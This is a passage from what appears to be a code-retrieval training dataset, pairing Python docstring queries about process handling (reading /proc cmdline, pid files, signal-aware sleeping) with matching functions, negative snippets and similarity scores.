__salt__[\"cmd.run\"](f\"lxc-info -n {name}\").split(\"\\n\")\n pid = [\n line.split(\":\")[1].strip()\n for line in info\n if re.match(r\"\\s*PID\", line) is not None\n ][0]\n return pid", "def GetChromePid(self):\n result = self.GetChromeProcess()\n if result and 'pid' in result:\n return result['pid']\n return None", "def pid(self):\n return self._pid", "def pid(self):\n return self._pid" ]
[ "0.7579522", "0.74366933", "0.7350737", "0.72607666", "0.707823", "0.6928475", "0.68607014", "0.6809271", "0.68042326", "0.67258936", "0.6717959", "0.6676065", "0.6591127", "0.64635587", "0.64168656", "0.63849145", "0.63500375", "0.6348595", "0.62905115", "0.6233244", "0.623055", "0.61107063", "0.6055809", "0.60377795", "0.60055953", "0.5990423", "0.5931218", "0.5907016", "0.59000325", "0.59000325" ]
0.79762614
0
Returns True if the commandline arguments for the specified process can be read.
def __can_read_command_line(self, pid): return os.path.isfile('/proc/%d/cmdline' % pid)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def depends_on_process(self, process):\n for output_resource in process.iter_outputs():\n if self.has_input(output_resource):\n return True\n return False", "def check_arguments(self):\n self.check_num_arguments()\n self.are_readable_files(self.args)", "def check_args(self):\n parser = get_base_arguments(get_parser())\n parser = get_tc_arguments(parser)\n # Disable \"Do not use len(SEQ) as condition value\"\n # pylint: disable=C1801\n if len(sys.argv) < 2:\n self.logger.error(\"Icetea called with no arguments! \")\n parser.print_help()\n return False\n elif not self.args.ignore_invalid_params and self.unknown:\n self.logger.error(\"Unknown parameters received, exiting. \"\n \"To ignore this add --ignore_invalid_params flag.\")\n self.logger.error(\"Following parameters were unknown: {}\".format(self.unknown))\n parser.print_help()\n return False\n return True", "def is_command_ancillary(args):\n # pylint: disable=bad-continuation\n if (\n # skip the parent check and only\n # determine if the parameter is present\n is_valid_executes(args, skip=True)\n ):\n return True\n return False", "def parameters_are_valid():\n # The only accepted number of command line arguments is 3: they are\n # aggregator.py, the filename, and the topic\n if len(sys.argv) != 3:\n # Issue error message if invalid number of command line arguments\n print(\"Error: invalid number of arguments\")\n print(\"Usage: aggregator.py filename topic\")\n return False\n else:\n return True", "def hasCommand():\n args = sys.argv[1:]\n if '--help' in args:\n return False\n if '-h' in args:\n return False\n for arg in args:\n if arg and not arg.startswith('-'):\n return True\n return False", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def validate_args() -> bool:\n if len(argv) == 1 or \\\n '--help' in argv:\n print(usage)\n return False\n return True", "def validate_args(args):\n command = args[0]\n args_length = len(args) - 1\n return VALID_COMMANDS[command] == args_length", "def validate_argv(argv):\n if len(argv) != 1:\n return False\n return True", "def is_available(self):\n try :\n p = subprocess.Popen([self.program_path, self.help_argument],stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n return p.wait() == self.help_return_code\n except OSError:\n return False", "def validate_input(self):\n if (self.options.mexURL and self.options.token): #run module through engine service\n return True\n\n if (self.options.user and self.options.pwd and self.options.root): #run module locally (note: to test module)\n return True\n\n log.debug('Dream3D: Insufficient options or arguments to start this module')\n return False", "def check_args():\n schema = Schema({\n 'FOLDREC': Use(open, error='FOLDREC file should be readable'),\n 'CLUSTAL': Use(open, error='CLUSTAL file should be readable'),\n 'CCMPRED': Use(open, error='CCMPRED file should be readable'),\n '--metafold': Use(open, error='METAFOLD_FILE should be readable'),\n '--nb_pdb': And(Use(int), lambda n: 1 <= n <= 405,\n error='--nb_pdb=NUM should be integer 1 <= N <= 405'),\n '--dssp': Use(open, error='dssp/mkdssp should be readable'),\n '--dope': Use(open, error='dope file should be readable'),\n '--benchmark': Use(open, error='BENCHMARK_FILE should be readable'),\n '--cpu': And(Use(int), lambda n: 0 <= n <= cpu_count(),\n error='--cpus=NUM should be integer 1 <= N <= ' + str(cpu_count())),\n # The output PATH is created (if not exists) at the end of the program\n # so we skip the check.\n object: object})\n try:\n schema.validate(ARGUMENTS)\n except SchemaError as err:\n exit(err)", "def matches(self, pid):\n if self._command_wildcards or self._command_regexs:\n # Matchers requiring comm file\n path = P.join(PROC_DIR, str(pid), 'comm')\n try:\n with open(path) as f:\n comm = f.read().rstrip()\n for pattern in self._command_wildcards:\n if fnmatch(comm, pattern):\n return True\n\n for re_obj in self._command_regexs:\n if re_obj.match(comm):\n return True\n except FileNotFoundError:\n # process may have exited before file could be read\n return False\n\n return False", "def check_running(process, min=1):\n if j.data.platform.is_linux():\n pids = get_pids(process)\n if len(pids) >= min:\n return True\n return False", "def check_cli():\n if \"--help\" in sys.argv or \"-h\" in sys.argv:\n _exit(__help__)\n debug = False\n if \"--debug\" in sys.argv:\n debug = True\n sys.argv.remove(\"--debug\")\n input_file_names = sys.argv[1:]\n return debug, input_file_names", "def validateInput(self): \n if (self.options.mexURL and self.options.token): #run module through engine service\n return True\n \n if (self.options.user and self.options.pwd and self.options.root): #run module locally (note: to test module)\n return True\n \n log.debug('Botanicam: Insufficient options or arguments to start this module')\n return False", "def process_check_input_argument():\n\n try:\n input_argv = sys.argv[1]\n if input_argv == \"0\":\n stand_alone_flag = 0\n else:\n stand_alone_flag = 0\n except IndexError:\n stand_alone_flag = 1\n\n return stand_alone_flag", "def _check_args(self, args):\n if len(args) == 0:\n print(\"No parameters provided.\")\n return False\n else:\n return True", "def is_valid_command(args):\n if args.command is not None:\n return True\n return False", "def toolHasOptions(*args, **kwargs)->bool:\n pass", "def validateProcess(process):\n \n schedule=process.schedule_()\n paths=process.paths_()\n endpaths=process.endpaths_()\n \n # check output mods are in paths and have appropriate settings\n for outputModName in process.outputModules_().keys():\n outputMod = getattr(process, outputModName)\n if not hasattr(outputMod, 'dataset'):\n msg = \"Process contains output module without dataset PSET: %s \\n\" % outputModName\n msg += \" You need to add this PSET to this module to set dataTier and filterName\\n\"\n raise RuntimeError(msg)\n ds=getattr(outputMod,'dataset')\n if not hasattr(ds, \"dataTier\"):\n msg = \"Process contains output module without dataTier parameter: %s \\n\" % outputModName\n msg += \" You need to add an untracked parameter to the dataset PSET of this module to set dataTier\\n\"\n raise RuntimeError(msg)\n\n # check module in path or whatever (not sure of exact syntax for endpath)\n omRun=False\n\n if schedule==None:\n for path in paths:\n if outputModName in getattr(process,path).moduleNames():\n omRun=True\n for path in endpaths:\n if outputModName in getattr(process,path).moduleNames():\n omRun=True\n else:\n for path in schedule:\n if outputModName in path.moduleNames():\n omRun=True\n if omRun==False:\n msg = \"Output Module %s not in endPath\" % outputModName\n raise RuntimeError(msg)", "def _check_valid_command_argument(valid_list, args):\n if args in valid_list:\n return 0\n else:\n return -1", "def cmd_has_option(self, executable, search_option, arg=None):\n if not executable:\n return False\n arg_list = []\n if arg and is_genstr(arg):\n arg_list = [arg]\n elif isinstance(arg, list):\n arg_list = arg\n out = Uprocess().get_output([executable] + arg_list + [\"--help\"])\n if out and search_option in re.split(r\"[=|\\*\\[\\]\\n,; ]+\", out):\n return True\n return False", "def test_cli_boolean_args(\n config,\n):\n args = CLI.parse_args([\"--version\"])\n assert args.version is True\n\n args = CLI.parse_args([\"--test\"])\n assert args.test is True\n\n args = CLI.parse_args([\"--print-config-file\"])\n assert args.print_config_file is True\n\n args = CLI.parse_args([\"-T\"])\n assert args.check_login is True", "def test_process_path(path):\n try:\n subprocess.call([path, \"--version\"])\n return True\n except:\n print(\"Cannot find executable on {}\".format(path))\n return False", "def check_argv():\n parser = argparse.ArgumentParser(description=__doc__.strip().split(\"\\n\")[0], add_help=False)\n parser.add_argument(\"segment_fn\", type=str, help=\"pickled segmentation file\")\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n return parser.parse_args()", "def has_required_programs(program_list):\n \n returnValue = True\n \n for program in program_list:\n if commands.getstatusoutput(\"which \"+program)[0] != 0:\n log.error(program+\" is required by \"+PROGRAM_NAME)\n returnValue = False\n \n return returnValue", "def check_argv():\n parser = argparse.ArgumentParser(description=__doc__.strip().split(\"\\n\")[0], add_help=False)\n parser.add_argument(\"keywordslist\", help=\"Numpy output file\")\n parser.add_argument(\"dirs\", help=\"Numpy output file\")\n parser.add_argument(\"npz_train\", help=\"Numpy output file\")\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n return parser.parse_args()", "def check_args(args):\n for arg in vars(args):\n if getattr(args, arg):\n return True\n return False" ]
[ "0.65596586", "0.6360689", "0.6212573", "0.61894363", "0.6104708", "0.6048994", "0.6045347", "0.5974168", "0.59560287", "0.58320457", "0.5827571", "0.5820868", "0.5817725", "0.58135414", "0.57502115", "0.5743185", "0.5727226", "0.56809455", "0.5666836", "0.56435555", "0.563625", "0.56149787", "0.5612502", "0.5513502", "0.5508815", "0.55057263", "0.5491771", "0.54863214", "0.54773945", "0.54729164" ]
0.7529902
0
Reads the commandline arguments for the specified pid and returns the contents.
def __read_command_line(self, pid): pf = None try: pf = file('/proc/%d/cmdline' % pid, 'r') return pf.read().strip() finally: if pf is not None: pf.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ReadArguments():\n\n args = ParseArguments()\n\n logging.info('Command line arguments...')\n for arg in vars(args):\n logging.info(str(arg) + ': ' + str(getattr(args, arg)))\n logging.info('')\n\n IsTest(args)\n ProcessCacheSize(args)\n ProcessLineSize(args)\n ProcessMulti(args)\n ProcessMemPattern(args)\n ProcessMemFile(args)", "def get_pid_full_cmdline_as_array(pid):\n try:\n f = open(\"/proc/%i/cmdline\" % pid,'r')\n except IOError:\n raise Exception(\"Could not open /proc/%i/cmdline, does not exist\" % pid);\n try:\n tmp = f.read()\n f.close()\n except IOError, ex:\n print ex\n raise Exception(\"Could not read from process cmdline\");\n assert tmp[-1] == '\\x00'\n return tmp[:-1].split(\"\\x00\")", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def get_args(args):\n parser = parse_arguments()\n return parser.parse_args(args)", "def get_backup_args(pid):\n cmd = [\"ps\", \"-p\", str(pid), \"-o\", \"args\", \"h\"]\n rc, output, err = run_cmd_output(cmd)\n if rc == 0:\n # The rc file should be the first argument after the command\n (_, all_args) = output.split(\"enbackup backup\")\n args = all_args.strip().split()[0]\n else:\n args = \"<Cannot find args for PID {}\".format(pid)\n return args", "def contentsOfFileSpecifiedIn(argv):\n for argument in argv:\n try:\n with open(argument) as testFile:\n return testFile.readlines()\n except EnvironmentError:\n pass # Expect many to not be files.\n \n # No file specified, try stdin\n try:\n if not stdin.isatty():\n return stdin.readlines() # Read, but only from non-interactive stdin\n except EnvironmentError:\n pass # Give up.\n return None", "def get_args():\n\n parser = get_argument_parser()\n args = parser.parse_args()\n\n return args", "def get_args_from_command_line():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_csv_path\", type=str)\n parser.add_argument(\"--text_column_order\", type=int)\n args = parser.parse_args()\n return args", "def _read_cmd_args():\n\n # Check if argument count is correct.\n if len(sys.argv) != 5:\n print(\"[ERR] Invalid number of command line arguments!\")\n _usage()\n sys.exit(1)\n\n # Get path to config file\n configfile = sys.argv[1]\n if not os.path.exists(configfile):\n print(f\"[ERR] Config file {configfile} does not exist!\")\n sys.exit(1)\n\n # Get top directory of LIS data\n topdatadir = sys.argv[2]\n if not os.path.exists(topdatadir):\n print(f\"[ERR] LIS data directory {topdatadir} does not exist!\")\n sys.exit(1)\n\n # Get valid year and month\n yyyymm = sys.argv[3]\n if len(yyyymm) != 6:\n print(\"[ERR] Invalid length of YYYYMM, must be 6 characters!\")\n sys.exit(1)\n year = int(yyyymm[0:4])\n month = int(yyyymm[4:6])\n try:\n startdate = datetime.datetime(year, month, day=1)\n except ValueError:\n print(\"[ERR] Invalid YYYYMM passed to script!\")\n sys.exit(1)\n\n # Get model forcing ID\n model_forcing = sys.argv[4]\n\n return configfile, topdatadir, startdate, model_forcing", "def read(*args):\n return io.open(os.path.join(HERE, *args), encoding=\"utf-8\").read()", "def get_args():\n if len(sys.argv) == 3:\n return sys.argv[1:]\n print(\"USAGE: python3 extract_cds.py infile outfile\\n\\n\")\n exit()", "def _argsForSubprocess(self) -> list[str]:\n pass", "def _read_cmd_args():\n\n # Check if argument count is correct.\n if len(sys.argv) != 4:\n print(\"[ERR] Invalid number of command line arguments!\")\n print(len(sys.argv))\n print(sys.argv[:])\n _usage()\n sys.exit(1)\n\n # Check if lis.config template exists.\n lis_config_template = sys.argv[1]\n if not os.path.exists(lis_config_template):\n print(f\"[ERR] {lis_config_template} does not exist!\")\n sys.exit(1)\n\n # Check if directory for restart files exists. Actual restart file\n # shall be checked later.\n restart_dir = sys.argv[2]\n if not os.path.exists(restart_dir):\n print(f\"[ERR] Directory {restart_dir} does not exist!\")\n sys.exit(1)\n\n # Get start date of new LIS run.\n yyyymmdd = sys.argv[3]\n if len(yyyymmdd) != 8:\n print(\"[ERR] Invalid length for YYYYMMDD, must be 8 characters!\")\n sys.exit(1)\n year = int(yyyymmdd[0:4])\n month = int(yyyymmdd[4:6])\n day = int(yyyymmdd[6:8])\n try:\n startdate = datetime.date(year, month, day)\n except ValueError:\n print(\"[ERR] Invalid YYYYMMDD passed to script!\")\n sys.exit(1)\n\n return lis_config_template, restart_dir, startdate", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def read_sockeye_args(params_path):\n with open(params_path) as f:\n content = f.readlines()\n\n res = []\n for line in content:\n res += line.split()\n return res", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def process_command_line_input():\n\n input_args = sys.argv\n if input_args[0].find('ipython') >= 0:\n input_args = list()\n else:\n input_args.pop(0)\n\n return input_args", "def read_cli_args(argv):\n\n # Working defaults\n cur_dir = os.getcwd()\n config_file = os.path.normpath(os.path.join(cur_dir, \"config.yaml\"))\n override_file = os.path.normpath(os.path.join(cur_dir, \"overrides.yaml\"))\n merged_file = os.path.normpath(os.path.join(cur_dir, \"build\", \"config.yaml\"))\n # Parse the args\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config-file',\n action='store', type=str, dest=\"config_file\",\n help='Path to Config file to read. Default:'\n + config_file,\n default=config_file)\n parser.add_argument('-o', '--override-file',\n action='store', type=str, dest=\"override_file\",\n help='Path to override file. Default:'\n + override_file,\n default=override_file)\n parser.add_argument('-m', '--merged-file',\n action='store', type=str, dest=\"merged_file\",\n help='Path to output of this script. Default:'\n + merged_file,\n default=merged_file)\n args = parser.parse_args()\n return args", "def extract_arguments(f: TextIO) -> List[str]:\n args = []\n for line in f.readlines():\n idx = line.find(\"#\")\n if idx != -1:\n line = line[:idx]\n\n args.extend(shlex.split(line))\n return args", "def get_args():\n parser = build_arg_parser()\n\n args = parser.parse_args()\n\n return prompt_for_password(args)", "def get_args():\n parser = argparse.ArgumentParser(\n description='Some Basic Spark Job doing some stuff on IMDb data stored within HDFS.')\n return parser.parse_args()", "def get_cli_arguments(self):\n pass", "def retrieve_args_dict():\n process_args = sys.argv[1:]\n dictionary = dict()\n for process_arg in process_args:\n splitted = process_arg.split(\":\")\n if len(splitted) > 1:\n key = splitted[0]\n value = \"\".join(splitted[1:])\n dictionary[key] = value\n return dictionary", "def Get_Arguments():\n parser = argparse.ArgumentParser(description=\"Adds batch, species, subspecies \"\n \"columns to popmap file for summarizing ExDFOIL output\",\n add_help=False)\n\n required_args = parser.add_argument_group(\"Required Arguments\")\n optional_args = parser.add_argument_group(\"Optional Arguments\")\n\n ## Required Arguments\n required_args.add_argument(\"-p\", \"--popmap\",\n type=str,\n required=True,\n help=\"String; Tab-separated popmap file: indID\\tpopID\")\n\n ## Optional Arguments\n optional_args.add_argument(\"-b\", \"--batch\",\n type=str,\n required=False,\n default=None,\n nargs=\"?\",\n help=\"Filename containing batchIDs\")\n optional_args.add_argument(\"-S\", \"--species\",\n type=str,\n required=False,\n default=None,\n nargs=\"?\",\n help=\"Filename containing speciesIDs\")\n optional_args.add_argument(\"-s\", \"--subspecies\",\n type=str,\n required=False,\n default=None,\n nargs=\"?\",\n help=\"Filename containing subspeciesIDs\")\n optional_args.add_argument(\"-o\", \"--outfile\",\n type=str,\n required=False,\n default=\"mysampleinfo.txt\",\n nargs=\"?\",\n help=\"Specify output filename; default=mysampleinfo.txt\")\n optional_args.add_argument(\"-h\", \"--help\",\n action=\"help\",\n help=\"Displays this help menu\")\n\n\n args = parser.parse_args()\n\n return args", "def get_cmd_args():\n\n\n\t#Creates the Argument Parser\n\tparser = ArgumentParser(description = \"ID Lab qPCR Analysis v\" + VERSION + \" \" + QUALITY)\n\n\t#Adds the input file argument\n\tparser.add_argument('-f', '--file',\n\t\t\t\tnargs = '+',\n\t\t\t\ttype = FileType('r'),\n\t\t\t\trequired = True)\n\n\t#Adds the output directory\n\tparser.add_argument('-o', '--output',\n\t\t\t\trequired = True)\n\n\t#Adds the model argument, to select between the three models\n\tparser.add_argument('-m', '--mod', '--model',\n\t\t\t\tnargs = '?',\n\t\t\t\tchoices = ['relative', 'absolute', 'stability'],\n\t\t\t\trequired = True)\n\n\t#Adds the control genes argument, taking a list of gene names\n\tparser.add_argument('-cg', '--cgenes', '--controlgenes',\n\t\t\t\tnargs = '+',\n\t\t\t\trequired = True)\n\n\t#Adds the optional control sample argument for the stability model, taking a list of sample names\n\tparser.add_argument('-cs', '--csample', '--controlsamples',\n\t\t\t\tnargs = '*')\n\n\t#Adds optional outlier cutoff\n\tparser.add_argument('-oc', '--ocutoff',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.3)\n\n\t#Adds optional max outliers\n\tparser.add_argument('-om', '--omax',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.5)\n\n\t#Adds optional encoding \n\tparser.add_argument('-e', '--encoding',\n\t\t\t\tdefault = 'ISO-8859-1')\n\n\t#Adds optional header size\n\tparser.add_argument('-hd', '--header',\n\t\t\t\tdefault = 47)\n\n\treturn vars(parser.parse_args())", "def get_args(self):\n args = self._parser.parse_args()\n return self._prompt_for_password(args)", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"\"\"\n Yield a sorted frequency count of similar/dissimilar InChi DW/OpenBabel.\n\"\"\")\n\n parser.add_argument(\n \"file\",\n help=\"DataWarrior's list file exported after running the macro.\")\n args = parser.parse_args()\n\n data = args.file\n return data", "def command_line_arguments():\n\n try:\n parser = argparse.ArgumentParser(description='Log Handler/Cleaner/Copier for Idemia DocAuth')\n\n # Add required arguments.\n parser.add_argument('action', choices=['clean', 'download'], type=str, help='clean or download')\n\n # Parse the arguments\n args = parser.parse_args()\n\n return args\n\n except Exception as err:\n print(err)\n return", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self._begin_logging()\n if argv is None:\n argv = sys.argv\n logger.info(' '.join(argv))\n self._process_input_files()\n self._construct_links_of_interest()\n self._open_output_files()\n data = self._construct_data_struct()\n return data" ]
[ "0.65537363", "0.6036514", "0.5997907", "0.5957874", "0.5922425", "0.5763637", "0.57568336", "0.57552546", "0.57092315", "0.5705053", "0.56773204", "0.5660786", "0.56368196", "0.5633759", "0.56327707", "0.56173635", "0.5616477", "0.55958754", "0.5568026", "0.55643076", "0.5560166", "0.55585086", "0.5553483", "0.55095285", "0.55087584", "0.5487276", "0.5478973", "0.5474008", "0.54658204", "0.54509413" ]
0.6990076
0
Exit the process with a nonzero status if the agent is already running.
def fail_if_already_running(self): pid = self.__read_pidfile() if pid: message = "The agent appears to be running pid=%d. pidfile %s does exists.\n" sys.stderr.write(message % (pid, self.pidfile)) sys.exit(1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def processEnded(self, status):\r\n self.pid = None\r\n statusMap = {\r\n 0: ProcessDone,\r\n 1: ProcessTerminated,\r\n }\r\n self.proto.processEnded(Failure(statusMap[status](status)))", "def exit(status=None): # real signature unknown; restored from __doc__\n pass", "def exit(self, status=0):\n if self.logger:\n self.logger.debug(\"Beginning exit and cleanup.\")\n else:\n print \"Warning: Exiting, but logger has not been initialized.\"\n\n if self._lockfilename:\n AppHandler.remove_lock(self._lockfilename)\n\n gid = grp.getgrnam(self.groupowner)[2]\n\n # Check to make sure current process is in correct group\n allgroups = os.getgroups()\n if not gid in allgroups:\n self.logger.warning(\"Current process is not in the proper group ({0}).\".format(gid))\n\n # Make sure the log file ends up with the right group owner:\n if self._logfile:\n if os.stat(self._logfile)[5] != gid:\n os.chown(self._logfile, -1, gid)\n sys.exit(status)", "def process_exists(self, pid):\n try:\n os.kill(pid, 0)\n except OSError:\n return False\n return True", "def check_finish(self):\r\n return not self.proc.is_alive()", "def abort(self):\n\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def abort(self):\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def sanity_check_process(self):\n assert_equals(self.proc.returncode, None)\n time.sleep(1)", "def check_process_status(self, popenObj):\n if not isinstance(popenObj, subprocess.Popen):\n self.logger.error(\n \"Cannot terminate a process since the arg is not Popen object.\")\n return False, -1\n\n popenObj.poll()\n retcode = popenObj.returncode\n\n if retcode is None:\n return self.PROCESSSTATE_ALIVE\n return self.PROCESSSTATE_DEAD", "def _accept_exit_status(self, exit_status):\r\n return exit_status == 0", "def _accept_exit_status(self, exit_status):\r\n return exit_status == 0", "def do_exit(_arg=None):\n return True", "def kill_if_running(self):\n if self.process and self.process.state() == QProcess.Running:\n self.process.kill()", "def returncode(self):\n if self._returncode is None:\n raise RuntimeError('App process is still running')\n return self._returncode", "def end_script(status):\n if status is not 0:\n print(\"Failure occurred: \" + str(status))\n sys.exit(status)", "def do_exit(self, args):\n return sys.exit(1)", "def _is_alive(self) -> bool:\n\n if self._on:\n return True\n\n try:\n os.kill(self.proc.pid, 0)\n except (OSError, ProcessLookupError):\n return False\n\n return True", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def _exit_with_return(self) -> int:\n self.should_exit = True\n return 0", "def get_status(self) -> bool:\n try:\n self.__driver.service.assert_process_still_running()\n return True\n except AttributeError:\n return False", "def alive(self, pid):\n try:\n self.ssh(\"kill -0 %s\" % str(pid), allow_fail=False)\n return True\n except:\n return False", "def _accept_exit_status(self, exit_status):\r\n if exit_status != 0:\r\n return False\r\n return True", "def __procFinished(self, exitCode, exitStatus):\n self.__finish()", "def do_exit(self,*args):\r\n return True", "def exit(self):\n if self._isSubProcessRunning() and self._exitCommand is not None:\n self.__process.stdin.write(self._exitCommand)\n self.__process.stdin.write(os.linesep)\n self.__process.stdin.flush()\n time.sleep(0.5)\n \n if self._isSubProcessRunning() :\n self.__process.kill()\n time.sleep(0.1)\n print 'Done!'", "def test_stopProcessAlreadyStopped(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.assertIdentical(None, self.pm.stopProcess(\"foo\"))", "def wait_process_running(process):\n assert process.is_running()", "def status(self):\n # process running ?\n pid = self.get_pidfile()\n \n running = True\n \n # process is not running\n if pid is None:\n running = False\n else:\n if not self.send_signal(pid,0):\n running = False\n # abnormal state, delete the file\n self.delete_pidfile()\n \n if running:\n message = \"server is running\\n\"\n else:\n message = \"server is not running\\n\"\n sys.stdout.write(message)\n \n return running", "def finish(self, pid, sts):\r\n self.drain()\r\n\r\n es, msg = decode_wait_status(sts)\r\n\r\n now = time.time()\r\n self.laststop = now\r\n processname = self.config.name\r\n\r\n tooquickly = now - self.laststart < self.config.startsecs\r\n exit_expected = es in self.config.exitcodes\r\n\r\n if self.killing:\r\n # likely the result of a stop request\r\n # implies STOPPING -> STOPPED\r\n self.killing = 0\r\n self.delay = 0\r\n self.exitstatus = es\r\n\r\n msg = \"stopped: %s (%s)\" % (processname, msg)\r\n self._assertInState(ProcessStates.STOPPING)\r\n self.change_state(ProcessStates.STOPPED)\r\n\r\n elif tooquickly:\r\n # the program did not stay up long enough to make it to RUNNING\r\n # implies STARTING -> BACKOFF\r\n self.exitstatus = None\r\n self.spawnerr = 'Exited too quickly (process log may have details)'\r\n msg = \"exited: %s (%s)\" % (processname, msg + \"; not expected\")\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n\r\n else:\r\n # this finish was not the result of a stop request, the\r\n # program was in the RUNNING state but exited implies\r\n # RUNNING -> EXITED\r\n self.delay = 0\r\n self.backoff = 0\r\n self.exitstatus = es\r\n\r\n if self.state == ProcessStates.STARTING:\r\n # XXX I don't know under which circumstances this\r\n # happens, but in the wild, there is a transition that\r\n # subverts the RUNNING state (directly from STARTING\r\n # to EXITED), so we perform the correct transition\r\n # here.\r\n self.change_state(ProcessStates.RUNNING)\r\n\r\n self._assertInState(ProcessStates.RUNNING)\r\n\r\n if exit_expected:\r\n # expected exit code\r\n msg = \"exited: %s (%s)\" % (processname, msg + \"; expected\")\r\n self.change_state(ProcessStates.EXITED, expected=True)\r\n else:\r\n # unexpected exit code\r\n self.spawnerr = 'Bad exit code %s' % es\r\n msg = \"exited: %s (%s)\" % (processname, msg + \"; not expected\")\r\n self.change_state(ProcessStates.EXITED, expected=False)\r\n\r\n self.config.options.logger.info(msg)\r\n\r\n self.pid = 0\r\n self.config.options.close_parent_pipes(self.pipes)\r\n self.pipes = {}\r\n self.dispatchers = {}\r\n\r\n # if we died before we processed the current event (only happens\r\n # if we're an event listener), notify the event system that this\r\n # event was rejected so it can be processed again.\r\n if self.event is not None:\r\n # Note: this should only be true if we were in the BUSY\r\n # state when finish() was called.\r\n events.notify(events.EventRejectedEvent(self, self.event))\r\n self.event = None", "def exit_status(self):\n return self._exit_status" ]
[ "0.6195423", "0.6041457", "0.60360324", "0.59795636", "0.5978203", "0.59733963", "0.59637934", "0.5955729", "0.59308636", "0.5870076", "0.5870076", "0.58643895", "0.5832923", "0.5810707", "0.5802401", "0.579938", "0.57855886", "0.5770318", "0.5765552", "0.5759777", "0.5756108", "0.5749182", "0.5748616", "0.57373226", "0.5718921", "0.5711446", "0.57094246", "0.5695478", "0.5690299", "0.56885445" ]
0.66552776
0
Sleeps for at most the specified number of seconds while also handling signals. Python does not do a great job of handling signals quickly when you invoke the normal time.sleep(). This method is a Unixspecific implementation of a sleep that should do better quickly handling signals while sleeping. This method may return earlier than the requested number of seconds if a signal is received.
def sleep(self, seconds): # We schedule an alarm signal for x=seconds out in the future. # noinspection PyUnusedLocal def handle_alarm(signal_num, frame): pass signal.signal(signal.SIGALRM, handle_alarm) signal.alarm(seconds) # Wait for either the alarm to go off or for us to receive a SIGINT. signal.pause() # Remove the alarm if it is still pending. signal.alarm(0)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sleep(self, seconds):\n ten_ms_steps = int(round(seconds * 100))\n for _i in xrange(0,ten_ms_steps):\n if self._sequence_stop_signal:\n break\n sleep(0.01)", "def sleep(seconds):\n\n # Check seconds to ensure it is a valid type.\n if type(seconds) not in [long, float, int]:\n raise RepyArgumentError(\"Invalid type \" + str(type(seconds)))\n\n # Using getruntime() in lieu of time.time() because we want elapsed time \n # regardless of the oddities of NTP\n start = nonportable.getruntime()\n sleeptime = seconds\n\n # Return no earlier than the finish time\n finish = start + seconds\n\n while sleeptime > 0.0:\n time.sleep(sleeptime)\n\n # If sleeptime > 0.0 then I woke up early...\n sleeptime = finish - nonportable.getruntime()", "def sleep(seconds):\n\n return Sleep(seconds)", "def sleep(seconds):\n # After load and initializing the PvAPI Python's built-in 'sleep' function\n # stops working (returns too early). The is a replacement.\n from time import sleep,time\n t = t0 = time()\n while t < t0+seconds: sleep(t0+seconds - t); t = time()", "def _sleep(self, sleep_time: float = 10) -> None:\n sleep_until_interrupt(sleep_time, lambda: self.stopped, interval=0.5)", "def sleep(seconds):\r\n time.sleep(seconds)", "def sleep(seconds):\n time.sleep(seconds)", "def sleep(seconds):\n time.sleep(seconds)", "def sleep(sleep_time=0.250):\n time.sleep(sleep_time)", "def sleep(secs=1.0):\n time.sleep(secs)", "def sleep(min_seconds=1, max_seconds=10):\n time.sleep(randint(min_seconds, max_seconds))", "def sleep(seconds: typing.Union[float, int]):\n if seconds == 0:\n yield\n elif seconds == inf:\n yield from sleepinf()\n else:\n end = monotonic() + seconds\n while end >= monotonic():\n yield", "async def sleep(self, seconds):\n await self._sleep_until_nanos(_get_future_nanos(seconds))", "def sleep(self, seconds=60):\n\t\ttime.sleep(seconds)", "def sleep_for(timeToSleep):\r\n time.sleep(timeToSleep)", "def sleep(self, seconds):\n time.sleep(seconds)", "async def _sleep(self, sleep_time: float = 10) -> None:\n async def _interrupt() -> bool:\n return self.stopped\n await 